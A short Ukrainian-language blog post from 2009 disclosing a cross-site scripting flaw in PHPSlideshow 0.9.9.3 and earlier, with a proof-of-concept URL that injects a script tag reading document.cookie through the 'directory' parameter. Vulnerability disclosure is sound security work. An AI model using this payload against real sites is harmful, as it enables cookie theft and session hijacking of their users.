Нова уразливість в PHPSlideshow
19:33 07.03.200907.01.2009
Нещодавно, 04.01.2009, я знайшов нову Cross-Site Scripting уразливість в PHPSlideshow. Після того як оприлюднив попередню уразливість в PHPSlideshow. Дірку виявив на офіційному сайті http://www.zinkwazi.com. Про що найближчим часом повідомлю розробникам веб додатку.
Детальна інформація про уразливість з’явиться пізніше.
07.03.2009
XSS:
http://site/phpslideshow.php?directory=%3Cscript%3Ealert(document.cookie)%3C/script%3E:
Уразливі PHPSlideshow 0.9.9.3 та попереді версії. Розробник PHPSlideshow досі не виправив дану уразливість ні в своєму веб додатку, ні в себе на сайті.
